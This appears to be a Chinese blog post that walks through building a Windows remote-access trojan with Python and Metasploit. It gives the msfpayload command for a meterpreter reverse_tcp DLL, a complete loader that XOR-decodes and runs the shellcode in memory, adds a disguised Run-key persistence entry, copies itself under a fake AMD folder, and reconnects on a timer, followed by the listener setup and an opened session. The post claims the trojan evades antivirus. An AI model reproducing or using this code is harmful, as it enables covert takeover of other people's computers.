python+msf 制作 windows远控

最近分析的一个远控,后发现是meterpreter rever http shell,文件是个打包的python(打包成exe),感谢wstone的指导~

 

创建dll

./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444  -t dll X > /tmp/sc.dll

 

python

main.py

import sys, os
import shutil
import time
import ctypes
import glob
import multiprocessing
import multiprocessing.forking
from sc import sc
from win32file import GetLongPathName
import _winreg
from itertools import izip, cycle
from utils import getppid, kill, get_base_dir

RECONNECT_SLEEP = 60
STARTUP_SLEEP = 30
CHILD_STARTUP_SLEEP = 10

METER_NAME = "aticlex.exe"
METER_DIR = "AMD"
USER_DIR = os.path.expanduser("~")

try:
    from win32com.shell import shellcon, shell
    APPDATA_DIR = shell.SHGetFolderPath(0, shellcon.CSIDL_APPDATA, 0, 0)
    DATA_DIR = os.path.join(APPDATA_DIR, METER_DIR)
except:
    DATA_DIR = os.path.join(USER_DIR, METER_DIR)

METER_PATH = os.path.join(DATA_DIR, METER_NAME)

class _Popen(multiprocessing.forking.Popen):
    def __init__(self, *args, **kw):
        if hasattr(sys, 'frozen'):
            os.putenv('_MEIPASS2', sys._MEIPASS)
        try:
            super(_Popen, self).__init__(*args, **kw)
        finally:
            if hasattr(sys, 'frozen'):
                os.unsetenv('_MEIPASS2')


class Process(multiprocessing.Process):
    _Popen = _Popen


class Worker(Process):

    def xor(self, data, key='\x41\x82\x99\x73\x12\xf8\x0e\x38'):
        return ''.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key)))

    def run(self):
        time.sleep(CHILD_STARTUP_SLEEP)
        code = self.xor(sc)
        cbuf = ctypes.create_string_buffer(code)
        func = ctypes.cast(cbuf, ctypes.CFUNCTYPE(ctypes.HRESULT))
        func()

def install():
    reg = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER)
    key = _winreg.OpenKey(reg, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, _winreg.KEY_ALL_ACCESS)
    _winreg.SetValueEx(key, METER_NAME.split(".")[0], 0, _winreg.REG_SZ, METER_PATH)

    path = GetLongPathName(sys.executable)
    if path != METER_PATH:
        if not os.path.exists(DATA_DIR):
            os.makedirs(DATA_DIR)
        try:
            shutil.copy(path, METER_PATH)
        except Exception as e:
            sys.exit(1)
        os.execve(METER_PATH, [METER_PATH], os.environ)

def clean():
    try:
        base_dir = get_base_dir()
        temp_dir = os.path.abspath(os.path.join(base_dir, os.pardir))
        mei = base_dir.split("\\")[-1]
        pattern = "%s\\_MEI*" % temp_dir
        for path in glob.glob(pattern):
            path = GetLongPathName(path)
            if path != base_dir and mei.lower() not in path.lower():
                try:
                    shutil.rmtree(path)
                except:
                    pass
    except:
        pass

def main():
    kill(getppid())
    time.sleep(STARTUP_SLEEP)
    install()
    clean()
    while True:
        p = Worker()
        p.daemon = True
        p.start()
        p.join()
        time.sleep(RECONNECT_SLEEP)

if __name__ == "__main__":
    multiprocessing.freeze_support()
    main()

sc.py

sc='\x12\x34' .........

# sc = sc.dll open with rb mode

然后pythoninstall 生成exe。

  

监听:

msf > use exploit/multi/handler  
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  
payload => windows/meterpreter/reverse_tcp  
msf exploit(handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(handler) > set lport 4444  
lport => 4444  
msf exploit(handler) > run  

[*] Started reverse handler on 192.168.1.123:4444  
[*] Starting the payload handler...  
[*] Sending stage (770048 bytes) to 192.168.1.80  
[*] Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.80:1138) at 2014-10-22 19:03:43 -0500  
meterpreter >  

 

木马特征:

添加注册表启动项,定时load msf payload,过赛门铁克等杀软。

posted @ 2016-09-23 18:15  小小leo  阅读(4552)  评论(1编辑  收藏  举报